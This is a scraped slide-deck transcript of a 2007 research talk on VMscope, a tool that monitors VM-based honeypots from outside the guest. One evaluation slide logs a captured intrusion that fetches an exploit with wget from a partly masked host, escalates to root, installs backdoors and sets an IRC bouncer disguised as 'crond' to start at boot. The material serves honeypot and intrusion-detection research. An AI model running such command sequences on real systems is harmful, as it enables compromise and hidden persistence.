“Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George.

Slides:



Advertisements
Similar presentations
Secure In-VM Monitoring Using Hardware Virtualization Monirul Sharif, Wenke Lee, Weidong Cui, and Andrea Lanzi Presented by Tyler Bletsch.
Advertisements

Using VMX within Linux We explore the feasibility of executing ROM-BIOS code within the Linux x86_64 kernel.
Anh M. Nguyen, Nabil Schear, HeeDong Jung, Apeksha Godiyal, Samuel T.King University of Illionis at Urbana-Champaign Hai D. Nguyen Hanoi University of.
Web Canary -- client honey pot UTSA. Architecture of Web canary. 2.
Efficient VM Introspection in KVM and Performance Comparison with Xen
Virtual Machine Security Design of Secure Operating Systems Summer 2012 Presented By: Musaad Alzahrani.
Process Coloring: an Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu (Presenter) Department of Computer Science.
Virtual Machines Measure Up John Staton Karsten Steinhaeuser University of Notre Dame December 15, 2005 Graduate Operating Systems, Fall 2005 Final Project.
Presented by Boris Yurovitsky
Disco Running Commodity Operating Systems on Scalable Multiprocessors.
Process Coloring: An Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu, Ryan Riley Department of Computer Science.
Backtracking Intrusions Sam King Peter Chen CoVirt Project, University of Michigan.
Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and.
Process Coloring: an Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu (Presenter) Department of Computer Science.
An Out-of-the-Box Approach to High Assurance Computer System Monitoring and Integrity Protection Cyber Defense Conference, Rome, NY, May 12-14, 2008 Assistant.
A. Frank - P. Weisberg Operating Systems Structure of Operating Systems.
SubVirt: Implementing malware with virtual machines Yi-Min Wang Chad Verbowski Helen J. Wang Jacob R. Lorch Microsoft Research Samuel T. King Peter M.
Process Coloring: an Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu Department of Computer Science and Center.
Jiang Wang, Joint work with Angelos Stavrou and Anup Ghosh CSIS, George Mason University HyperCheck: a Hardware Assisted Integrity Monitor.
Virtualization for Cloud Computing
Xen and the Art of Virtualization. Introduction  Challenges to build virtual machines Performance isolation  Scheduling priority  Memory demand  Network.
CSE598C Virtual Machines and Their Applications Operating System Support for Virtual Machines Coauthored by Samuel T. King, George W. Dunlap and Peter.
Tanenbaum 8.3 See references
SymCall: Symbiotic Virtualization Through VMM-to-Guest Upcalls John R. Lange and Peter Dinda University of Pittsburgh (CS) Northwestern University (EECS)
Author : Jiang Wang, Angelos Stavrou, and Anup Ghosh Conference: RAID 2010 Advisor: Yuh-Jye Lee Reporter: Yi-Hsiang Yang
1 UCR Firmware Attacks and Security introduction.
Introduction Overview Static analysis Memory analysis Kernel integrity checking Implementation and evaluation Limitations and future work Conclusions.
Honeypots. Introduction A honeypot is a trap set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems.
Kenichi Kourai (Kyushu Institute of Technology) Takuya Nagata (Kyushu Institute of Technology) A Secure Framework for Monitoring Operating Systems Using.
Operating System Support for Virtual Machines Samuel T. King, George W. Dunlap,Peter M.Chen Presented By, Rajesh 1 References [1] Virtual Machines: Supporting.
Honeypot and Intrusion Detection System
The Semantic Gap Challenge Stealthy Malware Detection Through VMM-Based “Out-of-the-Box” Semantic View Reconstruction November 2007 ACM: Association for.
Benefits: Increased server utilization Reduced IT TCO Improved IT agility.
Secure & flexible monitoring of virtual machine University of Mazandran Science & Tecnology By : Esmaill Khanlarpour January.
Virtualization Paul Krzyzanowski Distributed Systems Except as otherwise noted, the content of this presentation is licensed.
Cosc 4010 Sandboxing. Last lecture Last time, we covered chroot, which is a method to "sandbox" a problem. –Not full proof by any means. Many simple mistakes.
Virtual Machine Security Systems Presented by Long Song 08/01/2013 Xin Zhao, Kevin Borders, Atul Prakash.
Stealthy Malware Detection Through VMM-based “Out-of-the-Box” Semantic View Reconstruction CCS’07, Alexandria, VA, Oct 29 – Nov 2, 2007 Xuxian Jiang, Xinyuan.
Ether: Malware Analysis via Hardware Virtualization Extensions Author: Artem Dinaburg, Paul Royal, Monirul Sharif, Wenke Lee Presenter: Yi Yang Presenter:
Politecnico di Torino Dipartimento di Automatica ed Informatica TORSEC Group Performance of Xen’s Secured Virtual Networks Emanuele Cesena Paolo Carlo.
29th ACSAC (December, 2013) SPIDER: Stealthy Binary Program Instrumentation and Debugging via Hardware Virtualization Zhui Deng, Xiangyu Zhang, and Dongyan.
COMS E Cloud Computing and Data Center Networking Sambit Sahu
Our work on virtualization Chen Haogang, Wang Xiaolin {hchen, Institute of Network and Information Systems School of Electrical Engineering.
 Introduction  Prior research  Problem overview  HookSafe Design  Implementation  Evaluation  Experiment result Conclusion.
Presented by: Reem Alshahrani. Outlines What is Virtualization Virtual environment components Advantages Security Challenges in virtualized environments.
 Virtual machine systems: simulators for multiple copies of a machine on itself.  Virtual machine (VM): the simulated machine.  Virtual machine monitor.
Research at FRIENDS Lab Dongyan Xu Associate Professor Department of Computer Science and Center for Education and Research.
1 HoneyNets. 2 Introduction Definition of a Honeynet Concept of Data Capture and Data Control Generation I vs. Generation II Honeynets Description of.
Midterm Meeting Pete Bohman, Adam Kunk, Erik Shaw.
Operating Systems Security
A. Frank - P. Weisberg Operating Systems Structure of Operating Systems.
Security Vulnerabilities in A Virtual Environment
Full and Para Virtualization
SubVirt: Implementing malware with virtual machines Authors: Samuel T. King, Peter M. Chen University of Michigan Yi-Min Wang, Chad Verbowski, Helen J.
Lecture 26 Virtual Machine Monitors. Virtual Machines Goal: run an guest OS over an host OS Who has done this? Why might it be useful? Examples: Vmware,
UNDER THE GUIDENCE OF: Mr.M.JAYANTHI RAO,M.Tech HOD OF IT. BY: I.ADITHYA(09511A1212) HONEYPOTS.
Information Security - 2
E Virtual Machines Lecture 1 What is Virtualization? Scott Devine VMware, Inc.
Virtualization.
CSC 482/582: Computer Security
Why VT-d Direct memory access (DMA) is a method that allows an input/output (I/O) device to send or receive data directly to or from the main memory, bypassing.
Eugene Spafford, Dongyan Xu, Ryan Riley
Containers and Virtualisation
CIT 480: Securing Computer Systems
Backtracking Intrusions
Backtracking Intrusions
OS Virtualization.
By Dunlap, King, Cinar, Basrai, Chen
Analysis of Mixed-mode Malware
Countering Kernel Rootkits with Lightweight Hook Protection
Presentation transcript:

“Out-of-the-Box” Monitoring of VM-based High-Interaction Honeypots Xuxian Jiang, Xinyuan Wang Department of Information and Software Engineering George Mason University {xjiang, RAID’07, Queensland, Australia, Sep 4, 2007

Outline  Motivation  VMscope  Enabling “Out-of-the-Box” Honeypot Monitoring  Evaluation  Related Work  Conclusion

Motivation  Promise of honeypots  Providing insights into intruders’ motivations, tactics, and tools  Highly concentrated datasets w/ low noise  Low false-positive and false negative rate  Discovering unknown vulnerabilities/exploitations  Example 1: HoneyMonkey finds first zero-day exploit [Wang+ NDSS’06]  Example 2: CERT advisory CA (solaris CDE subprocess control daemon – dtspcd)

Motivation  Honeypot monitoring  The essential component in any honeypot deployment  Two main approaches (state of the art)  External honeypot monitoring  e.g., tcpdump, ethereal, etc  Internal honeypot monitoring  e.g., syslog, sebek, etc Internal External Tamper- resistance Deep Inspection Low High Yes No

Motivation: A Real-World Example  Sebek – the de-facto high-interaction honeypot monitoring tool, which performs three basic tasks  Observe system call activities  Record Data  Export Data  However, it has been demonstrated that it can be detected, disabled, or completely evaded by NoSEBrEaK [Holz+, IAW’04/ BlackHat’04/Defcon 12]

Focus of This Talk  “Out-of-the-Box” honeypot monitoring  VMscope Internal External Deep Inspection Low High Yes No Tamper- resistance

 Key idea: leveraging and extending virtualization to enable tamper-resistant, deep inspection of VM-based high- interaction honeypots  Existing tools only achieve one of them, but not both Apache FirefoxIE Logger Guest OS Virtual Machine Monitor (VMM) Virtual Machine … Log VMscope Tamper-resistant Logging: VMscope is deployed completely “out-of-the-box” Tamper-resistant Logging: VMscope is deployed completely “out-of-the-box” Deep Inspection: VMscope intercepts and interprets all system call events

Apache FirefoxIE Guest OS Virtual Machine … Design (Sebek vs. VMscope)  Tamper-resistant logging:  In VMscope, log is not collected from inside the VM that is being monitored Logger Apache FirefoxIE OS Kernel Machine … Sebek Logger Virtual Machine Monitor (VMM) VMscope Logger

Design  Deep Inspection  What we can observe?  Low-level events  Privileged instructions, Interrupts, I/O accesses …  What we want to observe?  High-level events w/ semantic info  Especially system calls. Virtual Machine Monitor (VMM) Guest OS Semantic Gap

Bridging the Semantic Gap  Idea: leveraging the semantics associated with system call instructions  e.g., invoking “exit” system call: xorl %ebx, %ebx /* ebx = 0 */ mov $0x1, %eax /* eax = 1 */ int $0x80 /* interrupt*/  Also works when interpreting the system call return values  Other related issues  The current process  e.g., PID, UID, process name, etc  Guest memory addressing

Identifying the Current Process  The Linux kernel maintains a process-specific kernel stack (ESP)  ESP  struct task_struct in Linux 2.4  ESP  struct thread_info in Linux 2.6  The Windows kernel similarly maintains a data structure, i.e., KTHREAD, for each kernel thread  struct KTHREAD  struct EPROCESS  Works for Windows 2000/XP/2003, but with varing definitions, though

Guest Memory Addressing  Inside the VM, the hardware automates the translation process  Guest virtual -> guest physical  Outside the VM, we need to emulate the translation process  CR3  page directory  page table  guest physical

Outline  Motivation  VMscope  “Out-of-the-Box” Honeypot Monitoring  Evaluation  Related Work  Conclusion

Implementation  A prototype has been implemented on top of QEMU and VMware  LOCs (in C)  Supporting both Linux VMs and Windows VMs (in progress)  Demo (3.5mins) 

Evaluation  Deep Inspection  Apache normal runs  Apache under infections (by Slapper worms)  Honeypot incidents  Tamper-resistance  A comparative study between Sebek and VMscope  NoSEBrEaK + adore_ng (a kernel rootkit)

Deep Inspection – Apache  In response to a simple web request

Deep Inspection – A Honeypot Incident  Two vulnerabilities  Vul 1: Apache (CERT® CA )  Vul 2: Ptrace (CERT® VU )  Deployed at 23:00pm, 01/26/2007, compromised 3 hours later PID 1562 ( sh)[sys_execve 11]: bash -i... PID 1572 ( bash)[sys_execve 11]: uname -a PID 1573 ( bash)[sys_execve 11]: id PID 1574 ( bash)[sys_execve 11]: w... PID 1632 ( bash)[sys_execve 11]: ls PID 1633 ( bash)[sys_execve 11]: wget xxxxxxx.xx.ro/soft/expl PID 1634 ( bash)[sys_execve 11]: chmod +x expl PID 1635 ( bash)[sys_execve 11]:./expl Gaining a regular account: apache 2. Escalating to the root privilege

Deep Inspection – A Honeypot Incident PID 1674 ( bash)[sys_execve 11]: wget xxxxxxx.xx.ro/soft/naky.tgz PID 1676 ( bash)[sys_execve 11]: tar -zxvf naky.tgz PID 1679 ( bash)[sys_execve 11]: chmod +x * PID 1680 ( bash)[sys_execve 11]:./install... PID 1882 ( bash)[sys_execve 11]: mkdir ". " PID 1883 ( bash)[sys_execve 11]: wget PID 1886 ( bash)[sys_execve 11]: tar xvfz bnc.tgz PID 1888 ( bash)[sys_execve 11]: rm -rf bnc.tgz PID 1889 ( bash)[sys_execve 11]: mv psybnc crond PID 1892 ( bash)[sys_execve 11]: crond PID 1894 ( bash)[sys_execve 11]: pico /etc/rc.d/rc.local 3. Installing a set of backdoors 4. Installing an IRC bot that will auto-start after machine reboot

Tamper-resistance  Demo Clip (2.5 minutes): 

Performance Evaluation  Evaluation Environment  Dell PowerEdge server 2950 running Fedora Core 5 w/ a 3.73 GHz Xeon and 4GB RAM  Benchmark Applications

Related Work  Honeypot monitoring  External honeypot monitoring (e.g., tcpdump)  Ineffective when traffic is encrypted  Internal honeypot monitoring (e.g., Sebek)  Could be potentially detected, disabled and evaded  Other virtualization-based efforts  Xebek / VMM-based sensors  Not completely “out-of-the-box” Based on para-virtualization, which requires modifying the guest OS kernels Some logging components are still running inside the guest OS

Internal External Deep Inspection Low High Yes No Tamper- resistance Conclusions  A new approach to monitoring VM-based high- interaction honeypots – VMscope

Thank you!

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.